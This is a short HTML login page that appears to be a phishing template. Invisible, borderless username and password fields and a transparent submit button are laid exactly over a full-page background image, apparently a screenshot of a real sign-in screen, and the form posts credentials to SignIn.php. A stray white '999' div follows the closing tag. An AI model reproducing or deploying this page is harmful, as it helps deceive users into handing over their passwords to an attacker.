<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="icon"
     type="image/png"
     href="">
<style type="text/css">
body {margin:0 auto;}
#pagina {position:relative;width:1349px;height:768px;margin:0 auto;background:url(ico.png) top center no-repeat;}
#user {
        position:absolute;
        width:368px;
        height:28px;
        margin-top:107px;
        margin-left:40%;
        border:0px;
        left: -78px;
        top: 110px;
}
#pass {
        position:absolute;
        width:369px;
        height:29px;
        margin-top:105px;
        margin-left:40%;
        border:0px;
        left: -79px;
        top: 159px;
}
#submit {
        position:absolute;
        width:370px;
        height:36px;
        margin-top:130px;
        margin-left:580px;
        border:0px;
        background:none;
        left: -121px;
        top: 188px;
}
</style>
</head>
<body>
<div id="pagina">
        <form method="post" action="SignIn.php">
<input type="text" id="user" name="user" value="" required="required" />
<input type="password" id="pass" name="pass" value="" required="required" />
<input type="submit" id="submit" name="submit" value="" />
</body>
</html>

<div style='color: white;'>999</div>